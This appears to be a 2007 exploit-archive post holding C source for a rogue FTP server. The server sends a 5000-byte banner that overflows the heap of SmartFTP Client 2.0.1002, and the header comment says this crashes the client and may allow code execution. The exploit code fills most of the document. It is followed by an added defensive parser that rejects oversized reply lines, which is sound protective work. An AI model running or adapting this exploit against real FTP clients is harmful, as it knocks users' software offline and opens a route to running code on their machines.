
SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit

Feb 07 2007 19:57:19
Source: ace
/***************************************************************************
 * SmartFTP Client v 2.0.1002 Heap Overflow DoS
 *
 * There is a remote heap overflow in SmartFTP. When the app receives a long
 * banner (5000 char) the heap is smashed, leading to DoS and to code
 * execution.
 *
 * There are also two buffer overflows in the fields Address and Login.
 * I've reported this to Secunia but it seems they didn't think it was
 * dangerous 'cause they didn't publish anything about it. However a simple
 * drag'n drop could compromise your system..
 *
 * Have Fun!
 *
 * Coded by Marsu <Marsupilamipowa@hotmail.fr>
 ***************************************************************************/



#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
    char evilbuff[5000];
    struct sockaddr_in sin;
    SOCKET server, client;
    WSADATA wsaData;

    WSAStartup(MAKEWORD(1,1), &wsaData);

    /* Listen on the FTP control port and wait for one client. */
    server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons( 21 );
    bind(server, (SOCKADDR*)&sin, sizeof(sin));
    printf("[*] Listening on port 21...\n");
    listen(server, 5);
    printf("[*] Waiting for client ...\n");
    client = accept(server, NULL, NULL);
    printf("[+] Client connected\n");

    /* Banner: "220 " + 'A' padding + CRLF, NUL-terminated so that
       strlen() below returns 4999. */
    memset(evilbuff, 'A', 5000);
    memcpy(evilbuff, "220 ", 4);
    memcpy(evilbuff+4997, "\r\n\0", 3);

    if (send(client, evilbuff, (int)strlen(evilbuff), 0) == SOCKET_ERROR)
    {
        printf("[-] Error in send!\n");
        exit(-1);
    }
    printf("[+] Data sent\n");

    Sleep(1500);

    /* A failed second send means the client side of the connection is gone. */
    if (send(client, "boom?", 5, 0) == SOCKET_ERROR)
        printf("[+] Crashed? Crashed!\n");
    else
        printf("[-] Exploit failed!\n");

    closesocket(client);
    closesocket(server);
    WSACleanup();
    return 0;
}
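
The client-side check that stops the oversized-banner case described in the header comment, as an added example (not code from SmartFTP or from the original post): a reply-line parser that rejects any line longer than a fixed cap before copying it. The names ftp_parse_reply and FTP_MAX_LINE and the 512-byte cap are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FTP_MAX_LINE 512  /* assumed cap for this example, not a SmartFTP value */
enum { FTP_INCOMPLETE = -1, FTP_TOO_LONG = -2, FTP_MALFORMED = -3 };

/* Parse one CRLF-terminated reply line from rx[0..rx_len). On success, copy
 * the line (without CRLF) into out, NUL-terminate it and return the 3-digit
 * reply code. Never writes more than out_sz bytes. */
int ftp_parse_reply(const unsigned char *rx, size_t rx_len,
                    char *out, size_t out_sz)
{
    size_t i, line_len = 0;
    int found = 0;
    if (out == NULL || out_sz == 0)
        return FTP_MALFORMED;
    out[0] = '\0';
    /* Search for CRLF only inside the cap, so an unterminated or oversized
     * line is rejected instead of being accumulated. */
    for (i = 0; !found && i + 1 < rx_len && i <= FTP_MAX_LINE; i++) {
        if (rx[i] == '\r' && rx[i + 1] == '\n') {
            line_len = i;
            found = 1;
        }
    }
    if (!found)
        return rx_len > FTP_MAX_LINE + 1 ? FTP_TOO_LONG : FTP_INCOMPLETE;
    if (line_len >= out_sz)   /* refuse rather than truncate or overrun */
        return FTP_TOO_LONG;
    if (line_len < 3 || !isdigit(rx[0]) || !isdigit(rx[1]) || !isdigit(rx[2]) ||
        (line_len > 3 && rx[3] != ' ' && rx[3] != '-'))
        return FTP_MALFORMED;
    memcpy(out, rx, line_len);
    out[line_len] = '\0';
    return (rx[0] - '0') * 100 + (rx[1] - '0') * 10 + (rx[2] - '0');
}

int main(void)
{
    static unsigned char banner[5000];   /* constructed: size from the PoC above */
    char line[FTP_MAX_LINE + 1];
    memset(banner, 'A', sizeof banner);
    memcpy(banner, "220 ", 4);
    memcpy(banner + sizeof banner - 2, "\r\n", 2);
    printf("5000-byte banner -> %d\n",
           ftp_parse_reply(banner, sizeof banner, line, sizeof line));
    return 0;
}
```

A caller that gets FTP_TOO_LONG should close the control connection rather than keep reading; FTP_INCOMPLETE means more bytes are needed before a decision can be made.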